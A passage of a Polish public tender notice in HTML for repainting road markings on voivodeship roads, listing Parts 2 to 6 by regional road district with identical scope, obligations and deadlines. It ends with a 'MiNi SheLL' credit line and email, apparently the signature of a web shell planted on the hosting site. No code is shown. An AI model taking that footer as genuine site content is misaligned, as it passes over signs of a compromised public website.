- malowanie linii na skrzyżowaniach i przejściach dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych zastosowaniem kulek odblaskowych
- malowanie strzałek i innych symboli cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- frezowanie istniejącego malowania poziomego 
- malowanie grubowarstwowe chemoutwardzalne, gładkie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli  oraz linii na skrzyżowaniach i przejść dla pieszych 
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli oraz linii na skrzyżowaniach i przejść dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych na istniejącym, zanikającym oznakowaniu grubowarstwowym
Odnowienie oznakowania poziomego należy wykonać zgodnie z istniejącym projektem organizacji ruchu, który zostanie udostępniony Wykonawcy po podpisaniu umowy, a przed podpisaniem umowy dostępny jest do wglądu we właściwych miejscowo Rejonach Dróg Wojewódzkich. 
Zestawienie linii, przejść dla pieszych i piktogramów z lokalizacją zostanie przekazane Wykonawcy po podpisaniu umowy i przed przekazaniem terenu. 
4. Zamawiający zaleca zainteresowanym Wykonawcom przed złożeniem oferty w niniejszym postępowaniu dokonanie wizji w terenie oraz porównanie z dokumentacją przetargową. Koszty dokonania wizji w terenie ponosi  w całości Wykonawca. Każdy oferent ponosi pełną odpowiedzialność za treść uzyskanej informacji.
5. Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.
6. Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z późn. zm.) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego .
7. Wykonawca zobowiązany jest prowadzić malowanie w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Gwarancja - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> RDW Toruń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówieniem objęto drogi wojewódzkie administrowane przez RDW Toruń
W ramach części Zamawiający wydzielił 2 etapy realizacji zamówienia,                 szczegółowy przedmiar dotyczący każdego etapu znajduje się w kosztorysach  ofertowych właściwych dla danego etapu.
3. Zamówienie obejmuje następujący zakres robót 
- oczyszczenie nawierzchni przed malowaniem
- trasowanie malowanych powierzchni,
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- malowanie linii na skrzyżowaniach i przejściach dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych zastosowaniem kulek odblaskowych
- malowanie strzałek i innych symboli cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- frezowanie istniejącego malowania poziomego 
- malowanie grubowarstwowe chemoutwardzalne, gładkie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli  oraz linii na skrzyżowaniach i przejść dla pieszych 
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli oraz linii na skrzyżowaniach i przejść dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych na istniejącym, zanikającym oznakowaniu grubowarstwowym
Odnowienie oznakowania poziomego należy wykonać zgodnie z istniejącym projektem organizacji ruchu, który zostanie udostępniony Wykonawcy po podpisaniu umowy, a przed podpisaniem umowy dostępny jest do wglądu we właściwych miejscowo Rejonach Dróg Wojewódzkich. 
Zestawienie linii, przejść dla pieszych i piktogramów z lokalizacją zostanie przekazane Wykonawcy po podpisaniu umowy i przed przekazaniem terenu. 
4. Zamawiający zaleca zainteresowanym Wykonawcom przed złożeniem oferty w niniejszym postępowaniu dokonanie wizji w terenie oraz porównanie z dokumentacją przetargową. Koszty dokonania wizji w terenie ponosi  w całości Wykonawca. Każdy oferent ponosi pełną odpowiedzialność za treść uzyskanej informacji.
5. Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.
6. Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z późn. zm.) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego .
7. Wykonawca zobowiązany jest prowadzić malowanie w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> RDW Tuchola.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówieniem objęto drogi wojewódzkie administrowane przez RDW Tuchola
W ramach części Zamawiający wydzielił 2 etapy realizacji zamówienia,                 szczegółowy przedmiar dotyczący każdego etapu znajduje się w kosztorysach  ofertowych właściwych dla danego etapu.
3. Zamówienie obejmuje następujący zakres robót 
- oczyszczenie nawierzchni przed malowaniem
- trasowanie malowanych powierzchni,
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- malowanie linii na skrzyżowaniach i przejściach dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych zastosowaniem kulek odblaskowych
- malowanie strzałek i innych symboli cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- frezowanie istniejącego malowania poziomego 
- malowanie grubowarstwowe chemoutwardzalne, gładkie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli  oraz linii na skrzyżowaniach i przejść dla pieszych 
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli oraz linii na skrzyżowaniach i przejść dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych na istniejącym, zanikającym oznakowaniu grubowarstwowym
Odnowienie oznakowania poziomego należy wykonać zgodnie z istniejącym projektem organizacji ruchu, który zostanie udostępniony Wykonawcy po podpisaniu umowy, a przed podpisaniem umowy dostępny jest do wglądu we właściwych miejscowo Rejonach Dróg Wojewódzkich. 
Zestawienie linii, przejść dla pieszych i piktogramów z lokalizacją zostanie przekazane Wykonawcy po podpisaniu umowy i przed przekazaniem terenu. 
4. Zamawiający zaleca zainteresowanym Wykonawcom przed złożeniem oferty w niniejszym postępowaniu dokonanie wizji w terenie oraz porównanie z dokumentacją przetargową. Koszty dokonania wizji w terenie ponosi  w całości Wykonawca. Każdy oferent ponosi pełną odpowiedzialność za treść uzyskanej informacji.
5. Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.
6. Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z późn. zm.) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego .
7. Wykonawca zobowiązany jest prowadzić malowanie w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Gwarancja - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RDW Wąbrzeźno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówieniem objęto drogi wojewódzkie administrowane przez RDW Wąbrzeźno
W ramach części Zamawiający wydzielił 2 etapy realizacji zamówienia,                 szczegółowy przedmiar dotyczący każdego etapu znajduje się w kosztorysach  ofertowych właściwych dla danego etapu.
3. Zamówienie obejmuje następujący zakres robót 
- oczyszczenie nawierzchni przed malowaniem
- trasowanie malowanych powierzchni,
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- malowanie linii na skrzyżowaniach i przejściach dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych zastosowaniem kulek odblaskowych
- malowanie strzałek i innych symboli cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- frezowanie istniejącego malowania poziomego 
- malowanie grubowarstwowe chemoutwardzalne, gładkie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli  oraz linii na skrzyżowaniach i przejść dla pieszych 
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli oraz linii na skrzyżowaniach i przejść dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych na istniejącym, zanikającym oznakowaniu grubowarstwowym
Odnowienie oznakowania poziomego należy wykonać zgodnie z istniejącym projektem organizacji ruchu, który zostanie udostępniony Wykonawcy po podpisaniu umowy, a przed podpisaniem umowy dostępny jest do wglądu we właściwych miejscowo Rejonach Dróg Wojewódzkich. 
Zestawienie linii, przejść dla pieszych i piktogramów z lokalizacją zostanie przekazane Wykonawcy po podpisaniu umowy i przed przekazaniem terenu. 
4. Zamawiający zaleca zainteresowanym Wykonawcom przed złożeniem oferty w niniejszym postępowaniu dokonanie wizji w terenie oraz porównanie z dokumentacją przetargową. Koszty dokonania wizji w terenie ponosi  w całości Wykonawca. Każdy oferent ponosi pełną odpowiedzialność za treść uzyskanej informacji.
5. Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.
6. Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z późn. zm.) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego .
7. Wykonawca zobowiązany jest prowadzić malowanie w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RDW Włocławek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówieniem objęto drogi wojewódzkie administrowane przez RDW Włocławek
3. Zamówienie obejmuje następujący zakres robót 
- oczyszczenie nawierzchni przed malowaniem
- trasowanie malowanych powierzchni,
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- malowanie linii na skrzyżowaniach i przejściach dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych zastosowaniem kulek odblaskowych
- malowanie strzałek i innych symboli cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- frezowanie istniejącego malowania poziomego 
- malowanie grubowarstwowe chemoutwardzalne, gładkie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli  oraz linii na skrzyżowaniach i przejść dla pieszych 
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli oraz linii na skrzyżowaniach i przejść dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych na istniejącym, zanikającym oznakowaniu grubowarstwowym
Odnowienie oznakowania poziomego należy wykonać zgodnie z istniejącym projektem organizacji ruchu, który zostanie udostępniony Wykonawcy po podpisaniu umowy, a przed podpisaniem umowy dostępny jest do wglądu we właściwych miejscowo Rejonach Dróg Wojewódzkich. 
Zestawienie linii, przejść dla pieszych i piktogramów z lokalizacją zostanie przekazane Wykonawcy po podpisaniu umowy i przed przekazaniem terenu. 
4. Zamawiający zaleca zainteresowanym Wykonawcom przed złożeniem oferty w niniejszym postępowaniu dokonanie wizji w terenie oraz porównanie z dokumentacją przetargową. Koszty dokonania wizji w terenie ponosi  w całości Wykonawca. Każdy oferent ponosi pełną odpowiedzialność za treść uzyskanej informacji.
5. Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.
6. Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z późn. zm.) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego .
7. Wykonawca zobowiązany jest prowadzić malowanie w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> RDW Żołędowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówieniem objęto drogi wojewódzkie administrowane przez RDW Żołędowo
W ramach części Zamawiający wydzielił 2 etapy realizacji zamówienia,                 szczegółowy przedmiar dotyczący każdego etapu znajduje się w kosztorysach  ofertowych właściwych dla danego etapu.
3. Zamówienie obejmuje następujący zakres robót 
- oczyszczenie nawierzchni przed malowaniem
- trasowanie malowanych powierzchni,
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- malowanie linii na skrzyżowaniach i przejściach dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych zastosowaniem kulek odblaskowych
- malowanie strzałek i innych symboli cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- frezowanie istniejącego malowania poziomego 
- malowanie grubowarstwowe chemoutwardzalne, gładkie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli  oraz linii na skrzyżowaniach i przejść dla pieszych 
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli oraz linii na skrzyżowaniach i przejść dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych na istniejącym, zanikającym oznakowaniu grubowarstwowym
Odnowienie oznakowania poziomego należy wykonać zgodnie z istniejącym projektem organizacji ruchu, który zostanie udostępniony Wykonawcy po podpisaniu umowy, a przed podpisaniem umowy dostępny jest do wglądu we właściwych miejscowo Rejonach Dróg Wojewódzkich. 
Zestawienie linii, przejść dla pieszych i piktogramów z lokalizacją zostanie przekazane Wykonawcy po podpisaniu umowy i przed przekazaniem terenu. 
4. Zamawiający zaleca zainteresowanym Wykonawcom przed złożeniem oferty w niniejszym postępowaniu dokonanie wizji w terenie oraz porównanie z dokumentacją przetargową. Koszty dokonania wizji w terenie ponosi  w całości Wykonawca. Każdy oferent ponosi pełną odpowiedzialność za treść uzyskanej informacji.
5. Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.
6. Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z późn. zm.) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego .
7. Wykonawca zobowiązany jest prowadzić malowanie w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Gwarancja - 7</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com